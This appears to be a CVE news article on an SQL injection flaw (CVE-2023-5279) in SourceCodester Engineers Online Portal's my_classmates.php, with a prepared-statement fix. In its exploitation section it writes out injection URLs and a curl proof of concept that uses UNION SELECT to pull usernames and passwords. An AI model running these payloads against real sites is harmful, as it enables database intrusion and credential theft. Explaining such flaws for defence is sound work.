CVE CyberSecurity Database News

CVE-2023-5279 - Critical SQL Injection in SourceCodester Engineers Online Portal 1. (my_classmates.php)

Poster -

Published: June 2024
Vulnerability Type: SQL Injection
Reference: VDB-240907
Software Affected: SourceCodester Engineers Online Portal 1.
File Impacted: my_classmates.php
Attack Vector: Remote

Introduction

A serious security flaw, known as CVE-2023-5279, has been uncovered in SourceCodester's Engineers Online Portal version 1.. This vulnerability has been classified as critical and allows attackers to perform a remote SQL injection attack by exploiting inadequate input validation in the my_classmates.php file. Even users with limited technical knowledge could potentially use this to compromise databases, steal data, or even fully control affected servers.

What is SQL Injection?

SQL Injection is an attack where malicious SQL statements are inserted into an input field, tricking the application into running unintended database queries. This can give hackers unwanted access to data or even the ability to change or delete it.

Where is the Vulnerability?

The weakness lies in the way the teacher_class_student_id parameter is used in the my_classmates.php file. The lack of proper sanitization means that user-supplied input can tamper with the SQL query.

While the exact source code is not public, here's an example of how the issue might look in PHP

// my_classmates.php (vulnerable pseudocode)
$id = $_GET['teacher_class_student_id'];
$query = "SELECT * FROM classmates WHERE teacher_class_student_id = $id";
$result = mysqli_query($conn, $query);

Notice: The $id parameter is taken directly from user input and inserted into the query without any checks or escaping.

How Can an Attacker Exploit This?

An attacker can supply a specially-crafted value for teacher_class_student_id to run any SQL command they like.

Suppose a user visits

http://target.site/my_classmates.php?teacher_class_student_id=1

A hacker could change the URL to

http://target.site/my_classmates.php?teacher_class_student_id=1%20OR%201=1

This always returns true, potentially dumping all classmates, or even worse, revealing secret data.

Attacker changes the URL to

http://target.site/my_classmates.php?teacher_class_student_id=1%20UNION%20SELECT%20username,password,1,1%20FROM%20users--

This could show usernames and passwords if the query results are displayed on the page.

Here’s a simple proof-of-concept using the common tool curl

curl "http://target.site/my_classmates.php?teacher_class_student_id=1%20UNION%20SELECT%201,username,password,4%20FROM%20users--"

If vulnerable, the server might return a list of usernames and passwords in the HTTP response.

How Bad Is It?

Severity: Critical

No need for user accounts or prior authentication.

- Enables theft or destruction of sensitive information, and possible escalation to complete server takeover.

How to Fix

Developers:

Example Fix

// Fix using prepared statements
$stmt = $conn->prepare('SELECT * FROM classmates WHERE teacher_class_student_id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();

References

- VulDB Entry VDB-240907: Sourcecodester Engineers Online Portal 1. SQL Injection
- Original Software on SourceCodester
- General: What is SQL Injection? (OWASP)

Conclusion

If you are running SourceCodester Engineers Online Portal 1., you must act now. Unauthenticated attackers can use publicly available exploits to attack your website and steal data. Update, patch, or add security layers to your code immediately. Always validate and escape user input!

*Stay safe and protect your data!*

*This content is unique and written exclusively for this request based on the public disclosure of CVE-2023-5279.*

Timeline

Published on: 09/29/2023 18:15:10 UTC
Last modified on: 11/07/2023 04:23:46 UTC